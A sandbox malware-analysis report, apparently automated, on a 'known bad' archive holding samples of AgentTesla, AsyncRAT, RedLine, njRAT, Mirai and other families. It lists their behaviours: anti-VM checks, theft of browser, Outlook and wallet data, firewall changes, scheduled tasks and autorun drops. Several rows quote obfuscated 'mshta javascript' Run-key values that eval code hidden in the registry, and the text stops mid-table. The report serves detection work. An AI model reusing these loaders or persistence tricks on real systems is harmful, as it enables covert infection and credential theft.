Analysis Overview
SHA256
5695a75d96e56497ab5f7175d5c1da59a4565df668cb89db774eefbb5bfb6cf5
Threat Level: Known bad
The file 2023-09-04.zip was found to be: Known bad.
Malicious Activity Summary
Irata payload
Dcrat family
AgentTesla
Detect Fabookie payload
Darkcloud family
RedLine payload
njRAT/Bladabindi
Irata family
Strrat family
Njrat family
Detect Neshta payload
Async RAT payload
Mirai family
Asyncrat family
Neshta family
Fabookie
Nanocore family
DCRat payload
Agenttesla family
Redline family
Metasploit family
Looks for VirtualBox Guest Additions in registry
Checks for common network interception software
Looks for VMWare Tools registry key
Suspicious Office macro
Contacts a large (843) amount of remote hosts
Downloads MZ/PE file
Adds policy Run key to start application
Modifies Windows Firewall
UPX packed file
Checks QEMU agent file
Requests dangerous framework permissions
Reads user/profile data of web browsers
VMProtect packed file
Loads dropped DLL
Executes dropped EXE
Uses the VBS compiler for execution
Checks computer location settings
Drops startup file
Checks BIOS information in registry
Looks up external IP address via web service
Adds Run key to start application
Accesses Microsoft Outlook profiles
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Maps connected drives based on registry
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops autorun.inf file
Program crash
Enumerates physical storage devices
Unsigned PE
Detects Pyinstaller
NSIS installer
Office document contains embedded OLE objects
Suspicious behavior: MapViewOfSection
Modifies Internet Explorer settings
Creates scheduled task(s)
outlook_win_path
Checks processor information in registry
Delays execution with timeout.exe
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Gathers network information
Suspicious behavior: LoadsDriver
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
outlook_office_path
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2023-09-05 01:36
Signatures
Agenttesla family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Asyncrat family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Darkcloud family
Dcrat family
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Irata family
Irata payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Metasploit family
Mirai family
Nanocore family
Neshta family
Njrat family
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Strrat family
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Requests dangerous framework permissions
| Description | Indicator | Process | Target |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to receive SMS messages. | android.permission.RECEIVE_SMS | N/A | N/A |
| Allows an application to read SMS messages. | android.permission.READ_SMS | N/A | N/A |
| Allows an application to send SMS messages. | android.permission.SEND_SMS | N/A | N/A |
| Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. | android.permission.READ_PHONE_STATE | N/A | N/A |
| Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call. | android.permission.CALL_PHONE | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Office document contains embedded OLE objects
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-05 01:34
Reported
2023-09-05 02:08
Platform
win10v2004-20230831-en
Max time kernel
528s
Max time network
1679s
Command Line
Signatures
AgentTesla
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
njRAT/Bladabindi
Checks for common network interception software
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:yBWN8txbc=\"Wt\";w6P=new%20ActiveXObject(\"WScript.Shell\");Y61yJkLW=\"1ua1yH8jy\";BW18iC=w6P.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e2e0f7a1\\\\84488b81\");xdZC6lK3=\"vAgwnU8TK\";eval(BW18iC);DoCczC1h=\"WHM2y5Pes\";" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\svchost.exe | N/A |
Contacts a large (843) amount of remote hosts
Downloads MZ/PE file
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Checks QEMU agent file
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe | N/A |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c7caa8c30ecac23145985ecdefb5649.exe | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c7caa8c30ecac23145985ecdefb5649.exe | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Uses the VBS compiler for execution
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0c7caa8c30ecac23145985ecdefb5649 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\yatvoumatyxyebal.exe\" .." | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\0c7caa8c30ecac23145985ecdefb5649 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\yatvoumatyxyebal.exe\" .." | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\"" | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:yrUCfsab1=\"nvnujP\";uq31=new%20ActiveXObject(\"WScript.Shell\");qUz4oja=\"WRL\";Z1ekW0=uq31.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e2e0f7a1\\\\84488b81\");Rk0gQjh5fa=\"Yz6RH65\";eval(Z1ekW0);oaF7HEzr3I=\"0iPOPSc8J\";" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:zFq6OsWG6=\"fiBlM\";uC0=new%20ActiveXObject(\"WScript.Shell\");b4gyFzc=\"dIvGD\";tBD2i2=uC0.RegRead(\"HKCU\\\\software\\\\e2e0f7a1\\\\84488b81\");Z6SwqRE2=\"i4bYu4g\";eval(tBD2i2);WxDaBAS8b=\"VbZ2yA\";" | C:\Windows\SysWOW64\svchost.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\SysWOW64\svchost.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| File created | D:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
